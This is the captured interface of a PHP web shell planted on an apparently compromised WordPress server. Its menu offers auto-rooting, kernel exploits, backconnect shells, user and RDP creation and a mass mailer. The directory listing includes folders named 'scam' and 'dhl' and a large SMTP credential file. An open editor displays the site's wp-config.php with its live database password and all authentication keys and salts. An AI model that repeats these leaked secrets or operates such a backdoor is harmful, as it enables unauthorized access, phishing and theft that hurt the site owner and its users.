Linux hermes.alfaserver.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Apache
: 5.189.182.135 | : 216.73.216.28
36 Domain
8.4.14
begrecagr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
begrecagr /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
dhl
[ DIR ]
drwxr-xr-x
scam
[ DIR ]
drwxr-xr-x
tfh1ane2p
[ DIR ]
drwxr-xr-x
tracking
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
1002
B
-r--r--r--
index-old.php
405
B
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
odb.txt
1
B
-rw-r--r--
readme.html
7.25
KB
-rw-r--r--
robots.txt
65
B
-rw-r--r--
smtp_full.txt
846.76
KB
-rw-r--r--
sudo.php
109.68
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-blog.php
980
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.19
KB
-rw-------
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.21
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settin.zip
1.85
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'begrecagr_wp_3o4b9' ); /** Database username */ define( 'DB_USER', 'begrecagr_wp_gai13' ); /** Database password */ define( 'DB_PASSWORD', '5DfT~Vey3LTN4t?M' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '#s~A:gQ!iXO11W:4t+v+mh)!5:y@EQm:44!UW0g90PR4t-|g*5z[u&3_+i2Y|qbU'); define('SECURE_AUTH_KEY', 'L*Wxe9]Ao&t60lHN1;l~63i~65gGpdpG]R1b8OirF55N0MAg]9l6(l4j5Fnv-245'); define('LOGGED_IN_KEY', 'zgC5@oE!_UGf5c15]/E%1R0w0*8Zf5y060*/_3T9p4jx9g!QRW/380]PVdS]7-/Z'); define('NONCE_KEY', 'g%#@OM0(PE3c1!bQMt%GnC_015x]L;)/3&GFDSy8(WzAvYW4oJU72k5Pa[%YJjs8'); define('AUTH_SALT', 'kDZ-TH-Q1Qp+0mL98)8s0n567/6Sk!0w8aKgn-;7vdrR[lNMO682MwO!8:D3+22P'); define('SECURE_AUTH_SALT', ']nDT1:sCh3I+olw1g6r935)8G!%#2WtmXE#77kJjPg!w(cyFo71SfR-710JH/~_6'); define('LOGGED_IN_SALT', 'f]y23N66gL9KZW3&1#PkQj57O0OP4-0JNfk!+;]()!/n(3oW6(hDrQs-o_NpI9e0'); define('NONCE_SALT', '1c]kY~P6n&L8&mm80T7XivP;v]+i4QG@n7nRu76whh!:Uwn4SCsU9g1W4)OBY@10'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'myTgvvvkx_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close